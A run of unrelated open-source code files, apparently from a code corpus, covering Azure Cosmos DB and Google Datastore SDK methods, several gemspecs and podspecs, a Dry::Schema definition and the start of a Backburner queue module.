unless status_code == 202 || status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBCollectionGetResults.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Deletes an existing Azure Cosmos DB MongoDB Collection.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
#
def begin_delete_mongo_dbcollection(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
response = begin_delete_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:custom_headers).value!
nil
end
#
# Deletes an existing Azure Cosmos DB MongoDB Collection.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_delete_mongo_dbcollection_with_http_info(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
begin_delete_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:custom_headers).value!
end
#
# Deletes an existing Azure Cosmos DB MongoDB Collection.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_delete_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, 'collection_name is nil' if collection_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name,'collectionName' => collection_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:delete, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 202 || status_code == 204
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
result
end
promise.execute
end
#
# Update the RUs per second of an Azure Cosmos DB MongoDB collection
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB
# collection.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ThroughputSettingsGetResults] operation results.
#
def begin_update_mongo_dbcollection_throughput(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:nil)
response = begin_update_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Update the RUs per second of an Azure Cosmos DB MongoDB collection
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB
# collection.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_update_mongo_dbcollection_throughput_with_http_info(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:nil)
begin_update_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:custom_headers).value!
end
#
# Update the RUs per second of an Azure Cosmos DB MongoDB collection
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB
# collection.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_update_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, 'collection_name is nil' if collection_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
fail ArgumentError, 'update_throughput_parameters is nil' if update_throughput_parameters.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::ThroughputSettingsUpdateParameters.mapper()
request_content = @client.serialize(request_mapper, update_throughput_parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}/throughputSettings/default'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name,'collectionName' => collection_name},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:put, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 202 || status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::ThroughputSettingsGetResults.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
end
end
| 57.543058 | 239 | 0.724452 |
ff00db3e35a01164d3621ff2961d289bf2480e8a | 590 | # encoding: UTF-8
Gem::Specification.new do |s|
s.name = 'openproject-openid_connect'
s.version = '1.0.0'
s.authors = 'OpenProject GmbH'
s.email = '[email protected]'
s.summary = 'OpenProject OpenID Connect'
s.description = 'Adds OmniAuth OpenID Connect strategy providers to Openproject.'
s.license = 'GPLv3'
s.files = Dir['{app,config,db,lib}/**/*'] + %w(CHANGELOG.md README.md)
s.add_dependency 'openproject-auth_plugins'
s.add_dependency 'omniauth-openid_connect-providers', '~> 0.1'
s.add_dependency 'lobby_boy', '~> 0.1.3'
end
| 32.777778 | 83 | 0.666102 |
62d173014e566634789d48834ef270319bee256f | 491 | # frozen_string_literal: true
module MasterfilesApp
CommoditySchema = Dry::Schema.Params do
optional(:id).filled(:integer)
required(:commodity_group_id).filled(:integer)
required(:code).filled(Types::StrippedString)
required(:description).filled(Types::StrippedString)
required(:hs_code).filled(Types::StrippedString)
required(:requires_standard_counts).maybe(:bool)
required(:use_size_ref_for_edi).maybe(:bool)
# required(:active).filled(:bool)
end
end
| 32.733333 | 56 | 0.749491 |
917d3e6e9a9e3c3de7b682ac9b0fc38a91e98227 | 1,132 | Pod::Spec.new do |s|
s.name = 'Rex'
s.module_name = 'Rex'
s.version = '0.10.0'
s.summary = 'ReactiveCocoa Extensions'
s.description = <<-DESC
Extensions for ReactiveCocoa that may not fit in the core framework.
DESC
s.homepage = 'https://github.com/neilpa/Rex'
s.license = 'MIT'
s.author = { 'Neil Pankey' => '[email protected]' }
s.ios.deployment_target = '8.0'
s.osx.deployment_target = '10.10'
s.watchos.deployment_target = '2.0'
s.tvos.deployment_target = '9.0'
s.source = { :git => 'https://github.com/neilpa/Rex.git', :tag => s.version }
s.dependency 'ReactiveCocoa', '~> 4.1'
s.ios.framework = 'UIKit'
s.tvos.framework = 'UIKit'
s.osx.framework = 'AppKit'
s.source_files = 'Source/**/*.swift'
s.ios.exclude_files = 'Source/AppKit/*'
s.tvos.exclude_files = 'Source/AppKit/*', 'Source/UIKit/UIDatePicker.swift', 'Source/UIKit/UISwitch.swift', 'Source/UIKit/UISegmentedControl.swift'
s.watchos.exclude_files = 'Source/AppKit/*', 'Source/UIKit/*'
s.osx.exclude_files = 'Source/UIKit/*'
end
| 33.294118 | 149 | 0.621025 |
7ac71dd97e98800592c90c7c26c9c66fa1d9c3a5 | 2,014 | #
# Be sure to run `pod lib lint JJGuisoWebP.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'JJGuisoWebP'
s.version = '1.1'
s.summary = 'Decode Animated Image '
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/only-icesoul/JJGuisoWebP'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'only-icesoul' => '[email protected]' }
s.source = { :git => 'https://github.com/only-icesoul/JJGuisoWebP.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '9.0'
s.source_files = ['src/**/*.{swift,h}']
s.swift_version = '5.0'
s.vendored_frameworks = 'src/Frameworks/*.framework'
s.ios.preserve_paths = 'src/Frameworks'
s.public_header_files = 'src/Frameworks/**/Headers/*.{h}'
# comment arm64 for xcode 11 if any error
s.pod_target_xcconfig = { 'ARCHS' => '$(ARCHS_STANDARD)' ,
'ONLY_ACTIVE_ARCH' => 'YES'}
s.user_target_xcconfig = { 'ARCHS' => '$(ARCHS_STANDARD)', 'ONLY_ACTIVE_ARCH' => 'YES'}
# s.resource_bundles = {
# 'JJGuisoWebP' => ['JJGuisoWebP/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
| 35.333333 | 108 | 0.642006 |
873ef3117381a0ae86d484d1324f670434d0de8c | 19,826 | # frozen_string_literal: true
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
module Google
module Cloud
module Datastore
module Admin
module V1
# Metadata common to all Datastore Admin operations.
# @!attribute [rw] start_time
# @return [::Google::Protobuf::Timestamp]
# The time that work began on the operation.
# @!attribute [rw] end_time
# @return [::Google::Protobuf::Timestamp]
# The time the operation ended, either successfully or otherwise.
# @!attribute [rw] operation_type
# @return [::Google::Cloud::Datastore::Admin::V1::OperationType]
# The type of the operation. Can be used as a filter in
# ListOperationsRequest.
# @!attribute [rw] labels
# @return [::Google::Protobuf::Map{::String => ::String}]
# The client-assigned labels which were provided when the operation was
# created. May also include additional labels.
# @!attribute [rw] state
# @return [::Google::Cloud::Datastore::Admin::V1::CommonMetadata::State]
# The current state of the Operation.
class CommonMetadata
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class LabelsEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# The various possible states for an ongoing Operation.
module State
# Unspecified.
STATE_UNSPECIFIED = 0
# Request is being prepared for processing.
INITIALIZING = 1
# Request is actively being processed.
PROCESSING = 2
# Request is in the process of being cancelled after user called
# google.longrunning.Operations.CancelOperation on the operation.
CANCELLING = 3
# Request has been processed and is in its finalization stage.
FINALIZING = 4
# Request has completed successfully.
SUCCESSFUL = 5
# Request has finished being processed, but encountered an error.
FAILED = 6
# Request has finished being cancelled after user called
# google.longrunning.Operations.CancelOperation.
CANCELLED = 7
end
end
# Measures the progress of a particular metric.
# @!attribute [rw] work_completed
# @return [::Integer]
# The amount of work that has been completed. Note that this may be greater
# than work_estimated.
# @!attribute [rw] work_estimated
# @return [::Integer]
# An estimate of how much work needs to be performed. May be zero if the
# work estimate is unavailable.
class Progress
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# The request for
# {::Google::Cloud::Datastore::Admin::V1::DatastoreAdmin::Client#export_entities google.datastore.admin.v1.DatastoreAdmin.ExportEntities}.
# @!attribute [rw] project_id
# @return [::String]
# Required. Project ID against which to make the request.
# @!attribute [rw] labels
# @return [::Google::Protobuf::Map{::String => ::String}]
# Client-assigned labels.
# @!attribute [rw] entity_filter
# @return [::Google::Cloud::Datastore::Admin::V1::EntityFilter]
# Description of what data from the project is included in the export.
# @!attribute [rw] output_url_prefix
# @return [::String]
# Required. Location for the export metadata and data files.
#
# The full resource URL of the external storage location. Currently, only
# Google Cloud Storage is supported. So output_url_prefix should be of the
# form: `gs://BUCKET_NAME[/NAMESPACE_PATH]`, where `BUCKET_NAME` is the
# name of the Cloud Storage bucket and `NAMESPACE_PATH` is an optional Cloud
# Storage namespace path (this is not a Cloud Datastore namespace). For more
# information about Cloud Storage namespace paths, see
# [Object name
# considerations](https://cloud.google.com/storage/docs/naming#object-considerations).
#
# The resulting files will be nested deeper than the specified URL prefix.
# The final output URL will be provided in the
# {::Google::Cloud::Datastore::Admin::V1::ExportEntitiesResponse#output_url google.datastore.admin.v1.ExportEntitiesResponse.output_url} field. That
# value should be used for subsequent ImportEntities operations.
#
# By nesting the data files deeper, the same Cloud Storage bucket can be used
# in multiple ExportEntities operations without conflict.
class ExportEntitiesRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class LabelsEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# The request for
# {::Google::Cloud::Datastore::Admin::V1::DatastoreAdmin::Client#import_entities google.datastore.admin.v1.DatastoreAdmin.ImportEntities}.
# @!attribute [rw] project_id
# @return [::String]
# Required. Project ID against which to make the request.
# @!attribute [rw] labels
# @return [::Google::Protobuf::Map{::String => ::String}]
# Client-assigned labels.
# @!attribute [rw] input_url
# @return [::String]
# Required. The full resource URL of the external storage location. Currently, only
# Google Cloud Storage is supported. So input_url should be of the form:
# `gs://BUCKET_NAME[/NAMESPACE_PATH]/OVERALL_EXPORT_METADATA_FILE`, where
# `BUCKET_NAME` is the name of the Cloud Storage bucket, `NAMESPACE_PATH` is
# an optional Cloud Storage namespace path (this is not a Cloud Datastore
# namespace), and `OVERALL_EXPORT_METADATA_FILE` is the metadata file written
# by the ExportEntities operation. For more information about Cloud Storage
# namespace paths, see
# [Object name
# considerations](https://cloud.google.com/storage/docs/naming#object-considerations).
#
# For more information, see
# {::Google::Cloud::Datastore::Admin::V1::ExportEntitiesResponse#output_url google.datastore.admin.v1.ExportEntitiesResponse.output_url}.
# @!attribute [rw] entity_filter
# @return [::Google::Cloud::Datastore::Admin::V1::EntityFilter]
# Optionally specify which kinds/namespaces are to be imported. If provided,
# the list must be a subset of the EntityFilter used in creating the export,
# otherwise a FAILED_PRECONDITION error will be returned. If no filter is
# specified then all entities from the export are imported.
class ImportEntitiesRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
# @!attribute [rw] key
# @return [::String]
# @!attribute [rw] value
# @return [::String]
class LabelsEntry
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
end
# The response for
# {::Google::Cloud::Datastore::Admin::V1::DatastoreAdmin::Client#export_entities google.datastore.admin.v1.DatastoreAdmin.ExportEntities}.
# @!attribute [rw] output_url
# @return [::String]
# Location of the output metadata file. This can be used to begin an import
# into Cloud Datastore (this project or another project). See
# {::Google::Cloud::Datastore::Admin::V1::ImportEntitiesRequest#input_url google.datastore.admin.v1.ImportEntitiesRequest.input_url}.
# Only present if the operation completed successfully.
class ExportEntitiesResponse
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Metadata for ExportEntities operations.
# @!attribute [rw] common
# @return [::Google::Cloud::Datastore::Admin::V1::CommonMetadata]
# Metadata common to all Datastore Admin operations.
# @!attribute [rw] progress_entities
# @return [::Google::Cloud::Datastore::Admin::V1::Progress]
# An estimate of the number of entities processed.
# @!attribute [rw] progress_bytes
# @return [::Google::Cloud::Datastore::Admin::V1::Progress]
# An estimate of the number of bytes processed.
# @!attribute [rw] entity_filter
# @return [::Google::Cloud::Datastore::Admin::V1::EntityFilter]
# Description of which entities are being exported.
# @!attribute [rw] output_url_prefix
# @return [::String]
# Location for the export metadata and data files. This will be the same
# value as the
# {::Google::Cloud::Datastore::Admin::V1::ExportEntitiesRequest#output_url_prefix google.datastore.admin.v1.ExportEntitiesRequest.output_url_prefix}
# field. The final output location is provided in
# {::Google::Cloud::Datastore::Admin::V1::ExportEntitiesResponse#output_url google.datastore.admin.v1.ExportEntitiesResponse.output_url}.
class ExportEntitiesMetadata
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Metadata for ImportEntities operations.
# @!attribute [rw] common
# @return [::Google::Cloud::Datastore::Admin::V1::CommonMetadata]
# Metadata common to all Datastore Admin operations.
# @!attribute [rw] progress_entities
# @return [::Google::Cloud::Datastore::Admin::V1::Progress]
# An estimate of the number of entities processed.
# @!attribute [rw] progress_bytes
# @return [::Google::Cloud::Datastore::Admin::V1::Progress]
# An estimate of the number of bytes processed.
# @!attribute [rw] entity_filter
# @return [::Google::Cloud::Datastore::Admin::V1::EntityFilter]
# Description of which entities are being imported.
# @!attribute [rw] input_url
# @return [::String]
# The location of the import metadata file. This will be the same value as
# the {::Google::Cloud::Datastore::Admin::V1::ExportEntitiesResponse#output_url google.datastore.admin.v1.ExportEntitiesResponse.output_url} field.
class ImportEntitiesMetadata
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Identifies a subset of entities in a project. This is specified as
# combinations of kinds and namespaces (either or both of which may be all, as
# described in the following examples).
# Example usage:
#
# Entire project:
# kinds=[], namespace_ids=[]
#
# Kinds Foo and Bar in all namespaces:
# kinds=['Foo', 'Bar'], namespace_ids=[]
#
# Kinds Foo and Bar only in the default namespace:
# kinds=['Foo', 'Bar'], namespace_ids=['']
#
# Kinds Foo and Bar in both the default and Baz namespaces:
# kinds=['Foo', 'Bar'], namespace_ids=['', 'Baz']
#
# The entire Baz namespace:
# kinds=[], namespace_ids=['Baz']
# @!attribute [rw] kinds
# @return [::Array<::String>]
# If empty, then this represents all kinds.
# @!attribute [rw] namespace_ids
# @return [::Array<::String>]
# An empty list represents all namespaces. This is the preferred
# usage for projects that don't use namespaces.
#
# An empty string element represents the default namespace. This should be
# used if the project has data in non-default namespaces, but doesn't want to
# include them.
# Each namespace in this list must be unique.
class EntityFilter
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# The request for
# {::Google::Cloud::Datastore::Admin::V1::DatastoreAdmin::Client#create_index google.datastore.admin.v1.DatastoreAdmin.CreateIndex}.
# @!attribute [rw] project_id
# @return [::String]
# Project ID against which to make the request.
# @!attribute [rw] index
# @return [::Google::Cloud::Datastore::Admin::V1::Index]
# The index to create. The name and state fields are output only and will be
# ignored. Single property indexes cannot be created or deleted.
class CreateIndexRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# The request for
# {::Google::Cloud::Datastore::Admin::V1::DatastoreAdmin::Client#delete_index google.datastore.admin.v1.DatastoreAdmin.DeleteIndex}.
# @!attribute [rw] project_id
# @return [::String]
# Project ID against which to make the request.
# @!attribute [rw] index_id
# @return [::String]
# The resource ID of the index to delete.
class DeleteIndexRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# The request for {::Google::Cloud::Datastore::Admin::V1::DatastoreAdmin::Client#get_index google.datastore.admin.v1.DatastoreAdmin.GetIndex}.
# @!attribute [rw] project_id
# @return [::String]
# Project ID against which to make the request.
# @!attribute [rw] index_id
# @return [::String]
# The resource ID of the index to get.
class GetIndexRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# The request for
# {::Google::Cloud::Datastore::Admin::V1::DatastoreAdmin::Client#list_indexes google.datastore.admin.v1.DatastoreAdmin.ListIndexes}.
# @!attribute [rw] project_id
# @return [::String]
# Project ID against which to make the request.
# @!attribute [rw] filter
# @return [::String]
# @!attribute [rw] page_size
# @return [::Integer]
# The maximum number of items to return. If zero, then all results will be
# returned.
# @!attribute [rw] page_token
# @return [::String]
# The next_page_token value returned from a previous List request, if any.
class ListIndexesRequest
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# The response for
# {::Google::Cloud::Datastore::Admin::V1::DatastoreAdmin::Client#list_indexes google.datastore.admin.v1.DatastoreAdmin.ListIndexes}.
# @!attribute [rw] indexes
# @return [::Array<::Google::Cloud::Datastore::Admin::V1::Index>]
# The indexes.
# @!attribute [rw] next_page_token
# @return [::String]
# The standard List next-page token.
class ListIndexesResponse
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Metadata for Index operations.
# @!attribute [rw] common
# @return [::Google::Cloud::Datastore::Admin::V1::CommonMetadata]
# Metadata common to all Datastore Admin operations.
# @!attribute [rw] progress_entities
# @return [::Google::Cloud::Datastore::Admin::V1::Progress]
# An estimate of the number of entities processed.
# @!attribute [rw] index_id
# @return [::String]
# The index resource ID that this operation is acting on.
class IndexOperationMetadata
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Metadata for Datastore to Firestore migration operations.
#
# The DatastoreFirestoreMigration operation is not started by the end-user via
# an explicit "creation" method. This is an intentional deviation from the LRO
# design pattern.
#
# This singleton resource can be accessed at:
# "projects/\\{project_id}/operations/datastore-firestore-migration"
# @!attribute [rw] migration_state
# @return [::Google::Cloud::Datastore::Admin::V1::MigrationState]
# The current state of migration from Cloud Datastore to Cloud Firestore in
# Datastore mode.
# @!attribute [rw] migration_step
# @return [::Google::Cloud::Datastore::Admin::V1::MigrationStep]
# The current step of migration from Cloud Datastore to Cloud Firestore in
# Datastore mode.
class DatastoreFirestoreMigrationMetadata
include ::Google::Protobuf::MessageExts
extend ::Google::Protobuf::MessageExts::ClassMethods
end
# Operation types.
module OperationType
# Unspecified.
OPERATION_TYPE_UNSPECIFIED = 0
# ExportEntities.
EXPORT_ENTITIES = 1
# ImportEntities.
IMPORT_ENTITIES = 2
# CreateIndex.
CREATE_INDEX = 3
# DeleteIndex.
DELETE_INDEX = 4
end
end
end
end
end
end
| 48.004843 | 162 | 0.598255 |
1107a8c9a5b8283dd0e592d4c38a59f7a85bb7dc | 939 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Google
module Apis
module MemcacheV1beta2
# Version of the google-apis-memcache_v1beta2 gem
GEM_VERSION = "0.16.0"
# Version of the code generator used to generate this client
GENERATOR_VERSION = "0.4.0"
# Revision of the discovery document this client was generated from
REVISION = "20211028"
end
end
end
| 32.37931 | 74 | 0.731629 |
912120a3ae9a38fee13c2b4b63f253d7fc1f9164 | 4,125 | module Backburner
module Queue
def self.included(base)
base.instance_variable_set(:@queue_name, nil)
base.instance_variable_set(:@queue_priority, nil)
base.instance_variable_set(:@queue_respond_timeout, nil)
base.instance_variable_set(:@queue_max_job_retries, nil)
base.instance_variable_set(:@queue_retry_delay, nil)
base.instance_variable_set(:@queue_retry_delay_proc, nil)
base.instance_variable_set(:@queue_jobs_limit, nil)
